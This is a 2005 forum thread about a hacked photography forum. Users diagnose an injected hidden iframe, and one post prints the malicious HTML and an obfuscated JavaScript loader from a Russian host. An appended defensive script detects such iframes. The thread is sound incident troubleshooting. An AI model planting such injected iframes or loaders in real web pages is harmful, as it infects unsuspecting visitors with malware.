Author Topic: Trojan Horse Warning  (Read 5179 times)
Jack Flesher
« on: November 20, 2005, 12:03:39 PM »

FWIW -- My virus detector signals a trojan horse virus every time I log into the user forums...

schaubild
« Reply #1 on: November 20, 2005, 12:11:02 PM »

Same with me. The site tries to run a file named load.exe...  
francois
« Reply #2 on: November 20, 2005, 12:18:59 PM »

With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
« Last Edit: November 20, 2005, 12:23:12 PM by francois »

Francois
Peter McLennan
« Reply #3 on: November 20, 2005, 12:45:20 PM »

Quote
With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.


This morning I'm getting a blocked popup warning when I go to "view new posts".  Never seen that here before.

Peter
Concorde-SST
« Reply #4 on: November 20, 2005, 12:48:11 PM »

Hello -

I'm from Europe and I never had such problems with this website.

I'm using a Mac with Safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
Gary Brown
« Reply #5 on: November 20, 2005, 12:49:57 PM »

In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
Ben Rubinstein
« Reply #6 on: November 20, 2005, 12:59:47 PM »

Yup, I've been getting that, I've had my virus program block it but it still opens an empty window and tries to load the link Gary mentioned.

francois
« Reply #7 on: November 20, 2005, 01:01:43 PM »

Quote
Hello -

I'm from Europe and I never had such problems with this website.

I'm using a Mac with Safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.

I'm also in Europe and using a Mac with Safari. As soon as the forum page loads, Safari closes the window. I tried to clear the caches & cookies and it helped somewhat but now it does it again.
     

Francois
francois
« Reply #8 on: November 20, 2005, 01:03:53 PM »

Quote
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.


If I load the offending URL, Safari (on the Mac) closes the window immediately. Using curl shows the hacked source leading to the Russian address.

"Hacked" LL forum source:
<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape &amp; Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>



"Russian" page source:
<script language=JavaScript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57,
45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3
9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv
_Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW")
</script>
« Last Edit: November 20, 2005, 01:12:39 PM by francois »

Francois
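
A defender-side check for the injection described in the two posts above, added here as an example (not code from the thread): it scans page source for iframes that load from another host and are effectively invisible. It uses tolerant regexes rather than an HTML parser because the injected tag quoted above is malformed; the function names and the second, benign iframe in the sample are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Tolerant patterns: the injected tag quoted above never closes with ">",
# so match up to the next ">" instead of relying on well-formed markup.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>]+))""")

def _attrs(raw):
    """Parse name=value pairs from the raw attribute text of one tag."""
    out = {}
    for name, dq, sq, bare in ATTR_RE.findall(raw):
        out.setdefault(name.lower(), dq or sq or bare)
    return out

def _tiny(value, limit=1):
    """True when the leading number of a dimension ("0", "1", "1px") is <= limit."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= limit

def find_hidden_iframes(html, site_host):
    """Return iframes that load from another host and are not visibly rendered."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(1))
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != site_host and not host.endswith("." + site_host)
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ((_tiny(a.get("width")) and _tiny(a.get("height")))
                  or "display:none" in style or "visibility:hidden" in style)
        if external and hidden:
            findings.append({"host": host, "src": a["src"], "offset": m.start()})
    return findings

# First cell: trimmed from the hacked source quoted in the post above.
# Second iframe: constructed, same-site and visibly sized, so it must not be flagged.
SAMPLE = (
    '<td class="row2"><span class="forumdesc">Nature Photography'
    '<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" '
    'width="1" height="1"<br /><br /><i></i></span></td>'
    '<iframe src="http://luminous-landscape.com/forum/constructed.html" '
    'width="468" height="60"></iframe>'
)

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE, "luminous-landscape.com"):
        print(finding)
```

Run against stored forum descriptions and rendered pages on a schedule, a check like this surfaces the tampering before visitors' antivirus does.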
Mark Guertin
Administrator
« Reply #9 on: November 20, 2005, 01:33:27 PM »

Thanks guys.

This has been fixed.  Someone found a way to trigger an unwanted password reset.

So no more trojan and I'm looking into how the password reset was triggered so they can't use this method to gain access any longer.

Mark

P.S. Thanks for the extra info in this thread, made it much easier to track down as I'm also on Safari on a Mac